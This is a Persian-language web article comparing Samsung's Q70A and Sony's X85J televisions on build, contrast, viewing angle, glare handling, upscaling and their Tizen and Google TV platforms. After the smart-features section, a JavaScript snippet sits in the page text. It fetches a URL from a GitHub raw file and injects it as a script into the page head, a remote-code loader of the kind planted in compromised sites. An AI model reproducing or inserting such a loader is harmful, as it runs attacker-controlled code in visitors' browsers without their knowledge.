دسته‌بندی نشده

مقایسه تلویزیون های سامسونگ Q70A و سونی X85J

تلویزیون های Q70A از سامسونگ و X85J از سونی تقریبا مشابه و یکسان هستند. برای هر دو این تلویزیون ها اندازه و اینچ های مختلفی عرضه شده است که هر کدام کارایی و عملکردی مناسب در سالن های مخصوص به خود انجام می دهند. هر دو مدل در اینچ های مشابه و یکسان 43 اینچ, 50 و 55 اینچ, 65 اینچ, 75 و 85 اینچ عرضه شده اند بنابراین می توان از ان ها در سالن های خیلی کوچک تا متراژ های بسیار بالا استفاده کرد. 

طراحی و ساختار 

تلویزیون های QLED کیولد 2021 سامسونگ از طراحی بسیار باریک و ظریفی برخوردار هستند و تلویزیون Q70A نیز از این قائده مستثنی نیست. این تلویزیون در هر اتاقی بسیار زیبا و درخشنده است. پایه این تلویزیون دارای دیزانی متفاوت از تلویزیون های دیگر این برند  Q60A و Q80A است و در قسمت مرکزی تلویزیون طراحی شده است و همچنین به اسانی روی میز های کوچک تر نیز قرار می گیرد.
تلویزیون X85J سونی طراحی زیبا و دیزاینی ساده دارد. در این تلویزیون همانند X90J طراحی ممتاز و متفاوتی ندارد و ساختاری تماما پلاستیکی دارد. این تلویزیون در بیشتر دکوراسیون ها زیبا و درخشنده به نظر می رسد. درگاه های ارتباطی این تلویزیون در قسمت های کناری قرار دارد بنابراین کاربردی عالی هنگام نصب به دیوار ایجاد می کنند. پایه های این تلویزیون با مدل X90J طراحی یکسان و هماهنگی دارند و می توانند به خوبی تلویزیون را نگهدارند. سایز های 43 و 50 اینچ این مدل پایه های متفاوت تری دارند و اندکی به مرکز تلویزیون نزدیک تر می باشند. از نظر فریم و حاشیه های اطراف تلویزیون مدل Q70A حاشیه های پهن تر اما با طراحی تخت دارد در مدل X85J سونی حاشه ها اندکی برامدگی دارند و از نظر اندازه ظریف تر و باریک تر می باشند. اندازه و ضخامت بدنه تلویزیون سونی بسیار بیشتر از سامسونگ است. Q70A دارای قطر 2.8 سانتی متر و X85J ضخامت 7.3 سانتی متری دارد. 

کنتراست

تلویزیون Q70 سامسونگ نسبت کنتراست فوق العاده ای دارد اما ممکن است در بین واحد های مختلف تفاوتی اندک داشته باشد. از نظر کنتراست این تلویزیون بیشترن نسبت را در بین تلویزیون های LED دارد که با وجود عدم برخورداری از لوکال دیمینگ ویژگی خوبی محسوب می شود. تلویزیون X85J سونی نیز کنتراستی عالی دارد و رنگ های مشکی در اتاق های تاریک روی ان به خوبی نمایش داده می شوند. با وجود عدم تعبیه قابلیت لوکال دیمینگ در این تلویزیون از نظر کنتراستی با تلویزیون X90J یکسان و هم سطح می باشد. 

زاویه دید

تلویزیون Q70A سامسونگ زاویه دید محدودی دارد و تصاویر در قسمت های حاشیه ای تا حدی دچار افت کیفیت خواهند شد. تلویزیون X85J نیز از این نظر عملکردی چندان جالب ندارد. قسمت های تاریک در زوایا دچار افت کیفیت می شوند اما رنگ ها نسبت به تلویزیون U8G هایسنس دقیق تر و بهتر ارائه می شوند. اگر می خواهید یک تلویزیون با زاویه دید گسترده تهیه کنید تلویزیون 2021 ال جی مدل NANO90 مناسب ترین گزینه برایتان می باشد. 

انعکاس و بازتاب نور

Q70A کنترل بالایی بر روی انعکاس و بازتاب نور دارد. نمایشگر این تلویزیون می تواند به خوبی نور لامپ و نور های موجود در اتاق را کنترل کند اما اگر در معرض مستقیم تابش قرار گیرد نباید انتظار کارکرد عالی از ان باشیم. X85J نیز عملکرد و کنترلی خوب در بازتاب دارد. همانند تلویزیون سامسونگ این تلویزیون نیز در اتاق های نورمتوسط کارایی عالی دارد اما در معرض تابش مستقیم نمی تواند کارایی چندان بالا داشته باشد. 

نحوه نمایش تصاویر

هر دو این تلویزیون ها با قابلیت فورکی 4K عرضه می شوند و عملکردی عالی و بدون مشکل در ارائه تصاویر دارند. تصاویر 1080p در هر دو این مدل ها جلوه ای زیبا دارند و به زیبایی فورکی پخش می شوند. محتویات 720p و 480p به خوبی و بدون هیچگونه مشکلی ارتقا پیدا می کند و به صورتی با کیفیت و با کوالتی عالی روی نمایشگر پخش خواهند شد. کیفیت 8K روی هیچ یک از مدل ها پشتیبانی نمی شود. 

پلتفرم و ویژگی های هوشمند

تلویزیون Q70A دارای سیستم عامل اختصاصی سامسونگ Tizen است. ورژن 2021 از این پلتفرم بر روی تلویزیون نصب شده است و کاربردی بسیار اسان و راحت دارد. ورژن 2021 تایزن بسیار حساس و روان تر از ورژن های قدیمی تر عمل می کند و هیچگونه مشکلی در کارکرد ان مشاهده نمی شود.
مدل X85J  سونی از ورژن ارتقا یافته اندروید Google TV نسخه 10 با کارکرد روان و حساس بهرمند است. این پلتفرم کارکردی اسان دارد و هیچگونه ایرادی در ان پیدا نمی شود  در ان از فروشگاه محتویات جهت دانلود برنامه ها و اپلیکیشن های مختلف استفاده شده است. تعداد زیادی از اپلیکیشن های مختلف به صورت نصب شده و یا قابل دانلود و نصب بر روی تلویزیون سامسونگ وجود دارند. در تلویزیون سونی رنج عظیمی از اپلیکشن ها با تنوع بالا در گوگل پلی استور قابل اجرا می باشند. 

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *